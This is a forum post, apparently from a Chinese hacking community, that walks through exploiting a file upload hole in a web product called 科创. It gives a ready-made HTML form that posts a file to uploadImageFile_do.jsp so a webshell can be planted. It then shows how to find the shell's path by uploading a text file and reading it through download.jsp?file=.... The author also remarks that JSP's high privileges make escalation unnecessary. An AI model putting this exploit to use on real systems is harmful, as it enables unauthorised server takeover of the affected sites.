查看: 10390|回复: 0

科创的文件上传漏洞

[复制链接]

该用户从未签到

发表于 2013-8-28 10:04:29 | 显示全部楼层 |阅读模式
本帖最后由 神仙 于 2013-8-28 10:17 编辑

漏洞利用方法,本地构造表单

[HTML] 纯文本查看 复制代码
<form id="frmUpload" enctype="multipart/form-data" action="http://loacal/comm_front/email/uploadImageFile_do.jsp" method="post">
 Upload a new file:<br>
 <input type="file" name="NewFile" size="50"><br>
 <input id="btnUpload" type="submit" value="Upload">
 </form>



这个漏洞网上有,转来转去都烂了,自己加点东西能死啊,看来看去几十篇和一篇有什么什么区别,
传了马之后看一下代码,代码里没有具体地址,我们要去寻找那个遗失的大马
1.jpg



看看代码email/uploadImageFile_do.jsp
跳转到这个页面下
2.jpg

传个txt上去,点击查看
3.jpg


http://xxx.cn/comm_front/email/download.jsp?file=/comm/common/appendix/xxxxxx.txt t
路径就出来啦


Jsp的权限一般很高,就不说提权了
4.jpg
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

GMT+8, 2024-11-23 19:55 , Processed in 0.030946 second(s), 17 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部